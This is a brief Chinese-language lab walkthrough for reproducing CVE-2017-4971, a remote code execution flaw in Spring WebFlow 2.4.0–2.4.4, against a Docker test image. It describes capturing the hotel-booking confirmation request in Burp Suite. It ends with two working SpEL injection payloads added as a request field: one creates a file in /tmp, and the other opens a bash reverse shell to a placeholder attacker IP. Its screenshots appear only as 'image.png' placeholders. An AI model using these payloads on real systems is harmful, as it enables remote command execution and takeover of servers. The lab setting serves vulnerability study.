Spring WebFlow框架的CVE-2017-4971实验

0x00
影响版本：
Spring WebFlow 2.4.0 ~ 2.4.4

实验环境：
从docker拉取，命令：

$ docker pull medicean/vulapps:s_springwebflow_1

启动环境：

$ docker run -d -p 80:8080 medicean/vulapps:s_springwebflow_1

用浏览器访问http://IP/login，左边有几个可以登录的账户，随便选一个登录。

image.png

进入http://192.168.88.140/hotels/1网址，然后点击“Book Hotel”，按照要求填写表格完以后点击“Proceed”。

image.png

这时候打开burpsuite抓包

然后点击“Confirm”

image.png

看到抓取到的POST数据

image.png

添加payload

image.png

会返回500的状态码

image.png

这时候进入到docker里面就可以看到已经在/tmp下成功创建了success文件。

是进入到docker里面，而且image_id后面要跟/bin/bash

_(new java.lang.ProcessBuilder("touch","/tmp/success")).start()=vulhub
//或者我们向其中添加一个字段（也就是反弹shell的POC）
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/【攻击机内网ip】/21 0>&1")).start()=vulhub

来源